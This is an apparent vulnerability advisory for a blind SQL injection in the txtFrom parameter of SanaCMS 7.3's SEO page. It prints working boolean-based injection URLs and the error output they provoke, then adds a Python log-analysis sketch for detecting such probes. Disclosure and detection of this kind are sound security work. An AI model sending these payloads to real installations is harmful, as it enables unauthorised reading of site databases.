SQL injection vulnerability in SANADATA SanaCMS 7.3

SQL injection vulnerability in /sanadata/seo/index.asp in SANADATA SanaCMS 7.3 allows remote attackers to execute arbitrary SQL commands via the txtFrom parameter.


Vulnerability Path : http://127.0.0.1/sanadata/seo/index.asp?txtFrom=[sql]
This vulnerability is a boolean-based blind SQL injection.

First I visit a link to find a SQL query error message:

http://127.0.0.1//sanadata/seo/index.asp?txtFrom=google%25' AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0 AND '%25''='

The error message is:
Syntax error in query expression '([From] Not Like '%esmhome.com%' And [From] Like '%google%' AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0 AND '%''='%' And True And True ) ORDER BY [id] DESC;'.
 /sanadata/seo/index.asp, line 92 
 
When we visit the link 
http://127.0.0.1/sanadata/seo/index.asp?txtFrom=google%25' AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0 AND '%25'=' 
the returned result is true.

Then visiting this link returns false:
http://127.0.0.1/sanadata/seo/index.asp?txtFrom=google%25' AND IIF(ATN(2)>0,1,0) BETWEEN 5 AND 4 AND '%25'=' 

So I can confirm there is a boolean-based blind SQL injection vulnerability.
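For defenders, the true/false request pair above leaves a recognisable trace in web server logs: the same client sends `txtFrom` values that break out of the string literal and differ only in their numeric constants. The following detection sketch is an added example, not part of the original advisory; the four-field log layout (client, method, path, raw query), the client addresses and the sample lines are constructed assumptions, so adapt the parsing to your real IIS log format.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

TARGET = "/sanadata/seo/index.asp"                # affected page named in the advisory
BREAKOUT = re.compile(r"'\s*(AND|OR)\b", re.I)    # quote followed by a boolean operator

# Constructed sample lines (client, method, path, raw query); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 GET /sanadata/seo/index.asp txtFrom=google
10.0.0.9 GET /sanadata/seo/index.asp txtFrom=google%25'%20AND%20IIF(ATN(2)>0,1,0)%20BETWEEN%202%20AND%200%20AND%20'%25'='
10.0.0.9 GET /sanadata/seo/index.asp txtFrom=google%25'%20AND%20IIF(ATN(2)>0,1,0)%20BETWEEN%205%20AND%204%20AND%20'%25'='
10.0.0.7 GET /sanadata/seo/index.asp txtFrom=o'reilly
"""

def txtfrom_values(log_text):
    """Yield (client, URL-decoded txtFrom) for requests to the affected page."""
    for line in log_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) != 4 or parts[2].lower() != TARGET:
            continue
        query = parse_qs(parts[3], keep_blank_values=True)
        for name, values in query.items():
            if name.lower() == "txtfrom":         # ASP parameter names are case-insensitive
                for value in values:
                    yield parts[0], value

def detect(log_text):
    """Return {client: verdict} for clients whose txtFrom escapes the string literal."""
    templates = defaultdict(lambda: defaultdict(set))
    for client, value in txtfrom_values(log_text):
        if BREAKOUT.search(value):
            # Mask numeric literals so a true/false probe pair collapses to one template.
            templates[client][re.sub(r"\d+", "N", value)].add(value)
    verdicts = {}
    for client, by_template in templates.items():
        paired = any(len(variants) > 1 for variants in by_template.values())
        verdicts[client] = "boolean-blind probing" if paired else "quote breakout"
    return verdicts

if __name__ == "__main__":
    for client, verdict in detect(SAMPLE_LOG).items():
        print(client, verdict)
```

A benign value containing an apostrophe, such as the constructed `o'reilly` line, is not flagged because no boolean operator follows the quote.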

